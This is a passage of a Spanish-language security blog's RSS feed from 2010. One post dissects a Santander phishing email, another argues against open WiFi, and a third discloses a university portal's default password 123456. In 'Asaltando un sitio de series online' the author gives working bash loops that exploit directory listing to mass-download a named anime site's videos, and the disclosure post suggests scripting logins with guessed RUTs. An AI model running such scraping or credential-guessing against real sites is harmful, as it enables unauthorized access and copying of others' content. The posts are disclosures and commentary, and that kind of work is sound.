Puede ser que Usted haya notado que la                                       semana pasada nuestro sitio                                       www.gruposantander.cl  funcionaba inestable                                       y se observaban frecuentes intermitencias.<br />
Hemos renovado nuestras instalaciones                                       bancarias y ahora el problema está                                       resuelto.</p></blockquote>
<p><span id="more-1670"></span></p>
<p>Aunque hasta ahora el mensaje podría ser creible, <strong>no aparece el nombre del cliente</strong>, ésto le resta un punto de credibilidad inmediatamente. Luego viene la parte menos creible:</p>
<blockquote><p>Pero para una capacidad de trabajo                                       correcta de sus cuentas bancarias, le                                       pedimos a Usted introducir los detalles                                       completos de la cuenta para que pudamos                                       renovar nuestra base de los clientes y                                       comprobar nuestro sistema nuevo de                                       protección de los datos.</p></blockquote>
<p>Hay que tener en cuenta que una entidad bancaria <strong>jamás</strong> hará este tipo de peticiones vía email. Como pueden ver en el <a href="http://www.santander.cl/campanas/aviso_seguridad_b/index.asp">sitio web de santander</a>:</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/santander_seguridad.png"><img class="aligncenter size-full wp-image-1684" title="santander_seguridad" src="http://blog.zerial.org/wp-content/uploads/2010/04/santander_seguridad.png" alt="" width="420" height="364" /></a></p>
<p>La siguiente parte del mensaje dice:</p>
<blockquote><p>Tome este enlace <a href="http://vaisver.com/1000imagenes/"><strong>santander.cl</strong></a> para verificar sus datos bancarios.<br />
Esta carta es automaticamente mandada a                                       cada cliente del Banco Santander Central                                       Hispano, no hay necesidad a responder.</p>
<p>Con respeto,<br />
El servicio del mantenimiento técnico del                                       Banco.</p></blockquote>
<p>Esto es engañoso, ya que envían un texto azúly  subrayado, lo que a primera vista parece ser un link o enlace &#8220;normal&#8221; hacia &#8220;santander.cl&#8221;, pero si nos fijamos con más detalles, podemos ver que el link está apuntando a &#8220;<em>http://vaisver.com/1000imagenes/</em>&#8220;, lo que <strong>obviamente</strong> no corresponde a un sitio del Santander.</p>
<p>Si vamos al detalle tecnico del mensaje y revisamos los headers, podemos encontrar que el correo fue enviado desde la direcciòn IP <em>67.255.202.16</em> correspondiente al host <em>host.eemporio.com</em>, la direccion IP corresponde a Grecia. Al ingresar a http://host.eemporio.com podemos ver la página por defecto de CPanel, por lo que deducimos que se trata de un servidor de hosting que tiene el envio de emails habilitado, y alguna persona, de dentro o desde afuera, se está aprovechando de alguna falla o acceso para usar ese servidor como relay para éste tipo de actos.</p>
<p>Si buscamos en Google, podemos ver muchos resultados que hacen referencia a phishing en este banco: <a href="http://www.google.cl/search?q=phishing+banco+santander&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a">http://www.google.cl/search?q=phishing+banco+santander&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a</a></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;linkname=Phishing%20a%20Banco%20Santander">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/phishing-a-banco-santander/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Estúpida campaña &#8220;Libera tu WiFi&#8221;</title>
		<link>http://blog.zerial.org/seguridad/estupida-campana-libera-tu-wifi/</link>
		<comments>http://blog.zerial.org/seguridad/estupida-campana-libera-tu-wifi/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 13:48:51 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[redes inalambricas]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1611</guid>
		<description><![CDATA[Mientras unos velan por la seguridad de las redes inalambricas y se parten la cabeza buscando algorítmos que sean lo suficientemente seguros, a otros se les ocurre la ridícula fantástica idea de dejar las redes inalámbricas sin clave. Para mi, es exáctamente igual a pedir a la gente que deje sus negocios y casas sin [...]]]></description>
			<content:encoded><![CDATA[<p>Mientras unos velan por la seguridad de las redes inalambricas y se parten la cabeza buscando algorítmos que sean lo suficientemente seguros, a otros se les ocurre la <a href="http://www.fayerwayer.com/2010/03/terremoto-chile-%C2%BFcomo-libero-mi-wifi/" target="_blank"><del datetime="2010-03-06T13:29:30+00:00">ridícula</del> fantástica idea de dejar las redes inalámbricas sin clave</a>. Para mi, es exáctamente igual a pedir a la gente que deje sus negocios y casas sin llaves y con las puertas abiertas, para que la gente pueda entrar a su casa y llevarse lo que necesite. ¿No es <span style="text-decoration: line-through;">demasiado</span> un poco estúpido? Pues sí, lo es.<br />
Piensen que el tener una red wifi con cifrado WEP ya es inseguro, imaginense sin cifrado.</p>
<p><strong>¿Qué se puede hacer cuando nos encontramos con una red <span style="text-decoration: line-through;">insegura</span> abierta?</strong><br />
Facilmente podemos <em>snifear</em> todo el trafico que está pasando por la red capturando información personal y privada, pudiendo hacer lo que queramos con ella. Se puede prestar para realizar phishing, robo de identidad, claves y accesos para sitios bancarios, robo de credenciales para distintos servicios como twitter, gmail, msn, etc.</p>
<p><strong>¿Cómo puedo aprovecharme de esta campaña?</strong><br />
Fácil. Basta con instalar un <em>honeypot</em> en varios puntos de la ciudad para que la gente piense que &#8220;alguien, amablemente, libero su wifi&#8221;.</p>
<p>Existen otras formas para ayudar a que la gente se comunique, pero esta me parece realmente tonta.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Festupida-campana-libera-tu-wifi%2F&amp;linkname=Est%C3%BApida%20campa%C3%B1a%20%26%238220%3BLibera%20tu%20WiFi%26%238221%3B">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/estupida-campana-libera-tu-wifi/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>La poca importancia de la seguridad en la Universidad Mayor</title>
		<link>http://blog.zerial.org/seguridad/la-poca-importancia-de-la-seguridad-en-la-universidad-mayor/</link>
		<comments>http://blog.zerial.org/seguridad/la-poca-importancia-de-la-seguridad-en-la-universidad-mayor/#comments</comments>
		<pubDate>Tue, 23 Feb 2010 17:54:46 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[datos personales]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[privacidad]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[universidad]]></category>
		<category><![CDATA[universidades vulnerables]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1600</guid>
		<description><![CDATA[Hace un par de semanas pudimos ver el caso del Instituto Profesional CIISA, ahora es el turno de la Universidad Mayor. Alvaro Veliz me ha reportado el siguiente problema básico de seguridad en la plataforma de ingreso de alumnos. Esta plataforma llamada &#8220;Portal Estudiantil&#8221; dice ser una &#8220;Intranet solo disponible para alumnos regulares y egresados&#8220;, [...]]]></description>
			<content:encoded><![CDATA[<p>Hace un par de semanas pudimos ver el caso del <a href="http://blog.zerial.org/seguridad/seguridad-en-accesos-de-ex-alumnos-del-instituto-profesional-ciisa/" target="_self">Instituto Profesional CIISA</a>, ahora es el turno de la Universidad Mayor.</p>
<p><a href="http://blog.alvaroveliz.cl" target="_blank">Alvaro Veliz</a> me ha reportado el siguiente problema básico de seguridad en la plataforma de ingreso de alumnos. Esta plataforma llamada &#8220;<em>Portal Estudiantil</em>&#8221; dice ser una &#8220;<em>Intranet solo disponible para alumnos regulares y egresados</em>&#8220;, sin embargo, ellos mismos dan la opción de que no sea así y que cualquier persona pueda ingresar tan solo probando con RUTs al azar.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/umayor_portal.png"><img class="aligncenter size-full wp-image-1601" title="umayor_portal" src="http://blog.zerial.org/wp-content/uploads/2010/02/umayor_portal.png" alt="" width="302" height="271" /></a></p>
<p>Podemos ver el mensaje en rojo que dice:</p>
<blockquote><p>La clave que debes ingresar para acceder al Portal  Estudiantil es 123456. Esta contraseña la debes cambiar en la pantalla  siguiente tal como se te solicita.<br />
IMPORTANTE: Al momento de cambiarla se te pide ingresar tu clave  anterior, ésta es 123456, no lo olvides.</p></blockquote>
<p><span style="font-family: Verdana,Arial,Helvetica,sans-serif; color: #ff0000; font-size: xx-small;"><strong><br />
</strong></span></p>
<p>Me pregunto cuanta gente, hasta la fecha de hoy, ha ingresado al portal y ha cambiado su clave? Bastaría con generar un script que pruebe una lista de RUTs probables con una clave 123456 y ganar acceso al sistema, obtener informacion de los alumnos y crear dolores de cabeza a los administradores cambiandole todos los datos al usuario. Con estos hechos queda demostrada la <strong>poca</strong> o nula preocupación por las Universiades cuando se trata de proteger la información personal y la privacidad de sus alumnos.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fla-poca-importancia-de-la-seguridad-en-la-universidad-mayor%2F&amp;linkname=La%20poca%20importancia%20de%20la%20seguridad%20en%20la%20Universidad%20Mayor">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/la-poca-importancia-de-la-seguridad-en-la-universidad-mayor/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Asaltando un sitio de series online</title>
		<link>http://blog.zerial.org/seguridad/asaltando-un-sitio-de-series-online/</link>
		<comments>http://blog.zerial.org/seguridad/asaltando-un-sitio-de-series-online/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 00:33:35 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[ocio]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[series]]></category>
		<category><![CDATA[sitios vulnerables]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1545</guid>
		<description><![CDATA[De aburridos, junto con E.A.S (o xwall), nos dedicamos a buscar un sitio que brinde el servicio de series de en linea para encontrar la forma de tomar prestadas todas las series alojadas en el servidor. Imaginense algo como YouTube, pero tan vulnerable que fuese posible extraer todos los videos que hay en la red. [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1546" title="geekthief" src="http://blog.zerial.org/wp-content/uploads/2010/02/geekthief.jpg" alt="" width="100" height="100" />De aburridos, junto con E.A.S (o xwall), nos dedicamos a buscar un sitio que brinde el servicio de series de en linea para encontrar la forma de tomar prestadas todas las series alojadas en el servidor. Imaginense algo como YouTube, pero tan vulnerable que fuese posible extraer todos los videos que hay en la red.<br />
Bien, nuestro objetivo fue un sitio de series de animé en línea llamado &#8220;<a href="http://efectoanime.com" target="_blank"><em>Efecto animé</em></a>&#8221; que, mediante el sitio <em><a href="http://www.satanick.net" target="_blank">Satanick.net</a> </em>logramos descargar todas las series y capítulos que se servían.</p>
<p><strong>La teoría</strong> es sencilla, la idea era encontrar un link directo a los distintos archivos multimedia o bien un enlace a algun directorios que los contenga, para luego descargar todo el contenido del directorio.<br />
<strong>El fallo</strong> por parte de ellos fue dejar que se liste el contenido de directorios, de esta forma pudimos tener acceso a informacón como la siguiente:</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/listing_thundercats.png"><img class="aligncenter size-medium wp-image-1548" title="listing_thundercats" src="http://blog.zerial.org/wp-content/uploads/2010/02/listing_thundercats-235x300.png" alt="" width="235" height="300" /></a></p>
<p>Luego, con un poco de magia, simplemente descargamos el contenido de todo ese directorio.</p>
<p><span id="more-1545"></span></p>
<p>Todo fue gracias al sitio &#8220;<em>Satanick</em>&#8221; el cual contiene un flash que provee al usuario poder ver series en línea, <span style="text-decoration: line-through;">afortunadamente</span> lamentablemente si vemos el código fuente nos encontramos con la siguiente sorpresa:</p>
<pre name="code" class="html">

<embed id="mpl" name="mpl" src="http://satanick.fxanime.org/wp-content/uploads/utilidades/player10.swf" width="800" height="460" type="application/x-shockwave-flash" quality="high" allowscriptaccess="always" allowfullscreen="true" wmode="transparent" flashvars="&amp;file=http://efectoanime.com/server/dn0te/06.mp4&amp;logo=http://satanick.net/wp-content/uploads/2010/01/tondr.png&amp;#&amp;backcolor=111111&amp;image=http://satanick.fxanime.org/wp-content/uploads/2009/10/canavassata.jpg&amp;frontcolor=cccccc&amp;lightcolor=00aeff&amp;controlbar=over&amp;volume=100&amp;autostart=true"></embed>
<input type="button" value="Ir a lista de capitulos" onclick="window.location.href='http://satanick.net/?page_id=3692'" />
</pre>
<p>Miren detenidamente el código a ver si encuentran algo que nos ayude a nuestro propósito. Encontramos:</p>
<p><strong>file=http://efectoanime.com/server/dn0te/06.mp4</strong></p>
<p>Con esto ya podemos deducir que todos los videos se encuentran en la URL http://efectoanime.com/server/XXX, donde XXX corresponde al nombre de la serie. Como vimos en la imágen que les mostré anteriormente (donde se listaban los archivos del directorio thundercats/), está permitido listado de archivos de un directorio. Nuestro amigo <strong>wget</strong> será la salvación, ya que con el parametro <strong>-r</strong> es posible descargar un directorio.</p>
<p>Bien, ahora nos falta automatizar el proceso. Las URL de Satanick, donde se encuetran los videos, son de la forma http://satanick.com/?page_id=XXX, por lo que podemos asumir que cada ID corresponde a una página y en cada página es posible que encontremos links como el que les acabo de mostrar (el html de más arriba). Entonces mi idea fue crear un script que recorriera todas las páginas desde XXX hasta XXX+n. Pensando que si lo hago desde 0 se iba a demorar una eternidad, solo lo hice desde el 3000 hasta el 10000, luego cada página examinada deberá ser <em>parseada</em> y se debe encontrar un patrón que nos permita obtener la URL donde se encuentran los videos.<br />
Yo lo hice de la siguiente forma:</p>
<p><code>for x in $(seq 3000 10000); do wget -O - http://satanick.net/?page_id=$x |grep "http://efectoanime.com/server" |awk -F '&amp;amp;' {'print $2'}&gt;&gt; lista_videos_satanick; done</code></p>
<p>Si lo queremos ver más bonito y en forma de &#8220;script&#8221;:</p>
<pre name="code" class="c">#!/bin/bash
for x in $(seq 3000 10000);
do
   wget -O - http://satanick.net/?page_id=$x |grep "http://efectoanime.com/server" |awk -F '&amp;' {'print $2'}>> lista_videos_satanick;
done</pre>
<p>El archivo &#8220;<em>lista_videos_satanick</em>&#8221; va a guardar todas las URL que encuentre y quedarás más o menos así:</p>
<blockquote><p>file=http://efectoanime.com/server/hades/h29.mp4<br />
file=http://efectoanime.com/server/hades/h29.mp4<br />
file=http://efectoanime.com/server/hades/h30.mp4<br />
file=http://efectoanime.com/server/hades/h30.mp4<br />
file=http://efectoanime.com/server/hades/h31.mp4<br />
file=http://efectoanime.com/server/hades/h31.mp4<br />
file=http://efectoanime.com/server/hades/h31.mp4<br />
file=http://efectoanime.com/server/thundercats/Th71.mp4<br />
file=http://efectoanime.com/server/thundercats/Th71.mp4<br />
file=http://efectoanime.com/server/thundercats/Th71.mp4<br />
file=http://efectoanime.com/server/thundercats/Th72.mp4<br />
file=http://efectoanime.com/server/thundercats/Th72.mp4<br />
file=http://efectoanime.com/server/thundercats/Th72.mp4<br />
file=http://efectoanime.com/server/thundercats/Th73.mp4<br />
file=http://efectoanime.com/server/thundercats/Th73.mp4<br />
file=http://efectoanime.com/server/thundercats/Th73.mp4<br />
file=http://efectoanime.com/server/thundercats/Th74.mp4<br />
file=http://efectoanime.com/server/thundercats/Th74.mp4
</p></blockquote>
<p>Lo único que debemos hacer es quitarle el principio &#8220;file=&#8221; y quitar las líneas repetidas:<br />
<code>sed -i 's/file=//g' lista_videos_satanick</code><br />
Nos quedará algo así:</p>
<blockquote><p>http://efectoanime.com/server/shippuden/Shippuden_144.mp4</p>
<p>http://efectoanime.com/server/bl34ch/B255.mp4</p>
<p>http://efectoanime.com/server/shippuden/Shippuden_145.mp4</p>
<p>http://efectoanime.com/server/md/612.mp4</p>
<p>http://efectoanime.com/server/bl34ch/B256.mp4</p>
<p>http://efectoanime.com/server/shippuden/Shippuden_146.mp4</p>
<p>http://efectoanime.com/server/thundercats/Th90.mp4</p>
<p>http://efectoanime.com/server/thundercats/Th92.mp4</p>
</blockquote>
<p>De todas estas URL lo que nos interesa es sólo <strong>http://efectoanime.com/server/XXX</strong>, entonces lo arreglamos:</p>
<p><code>awk -F '/' {'print $1"/"$2"/"$3"/"$4"/"$5'} lista_videos_satanick</code></p>
<p>Quedará algo así:</p>
<blockquote><p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/bl34ch</p>
<p>http://efectoanime.com/server/bl34ch</p>
<p>http://efectoanime.com/server/bl34ch</p>
<p>http://efectoanime.com/server/shippuden</p>
<p>http://efectoanime.com/server/shippuden</p>
<p>http://efectoanime.com/server/shippuden</p>
<p>http://efectoanime.com/server/MD</p>
<p>http://efectoanime.com/server/MD</p>
<p>http://efectoanime.com/server/MD</p></blockquote>
<p>Ahora debemos eliminar las repetidas:</p>
<p><code># awk -F '/' {'print $1"/"$2"/"$3"/"$4"/"$5'} lista_videos_satanick |sort|uniq -d</p>
<p>http://efectoanime.com/server/avatar</p>
<p>http://efectoanime.com/server/bl34ch</p>
<p>http://efectoanime.com/server/Chihiro</p>
<p>http://efectoanime.com/server/dn0te</p>
<p>http://efectoanime.com/server/hades</p>
<p>http://efectoanime.com/server/lcanvas</p>
<p>http://efectoanime.com/server/manga</p>
<p>http://efectoanime.com/server/md</p>
<p>http://efectoanime.com/server/MD</p>
<p>http://efectoanime.com/server/sayns</p>
<p>http://efectoanime.com/server/shippuden</p>
<p>http://efectoanime.com/server/thundercats</p>
<p>http://efectoanime.com/server/trailers</p>
<p>http://efectoanime.com/server/Vshow</code></p>
<p>Luego un script que descarge todos los contenidos de los directorios:</p>
<p><code>for link in $(cat lista_videos_satanick); do wget -r $link; done</code></p>
<p>Y listo.</p>
<blockquote><p><strong>1.6G	Death Note.tar<br />
1.6G	Saga de Hades.tar</strong>
</p></blockquote>
<h3>ACTUALIZADO <em>16/02/2009</em></h3>
<p>Luego de los comentarios de los responsables de los sitios, dando las gracias y diciendo que no les importa porque de todas formas tiene una marca de agua, etc etc.. Los directorios ya no se pueden listar:</p>
<blockquote><p>http://efectoanime.com/server/thundercats/</p></blockquote>
<p>Al fin y al cabo, si les importó el tema. Me alegro que les sirviera el post.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fasaltando-un-sitio-de-series-online%2F&amp;linkname=Asaltando%20un%20sitio%20de%20series%20online" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a 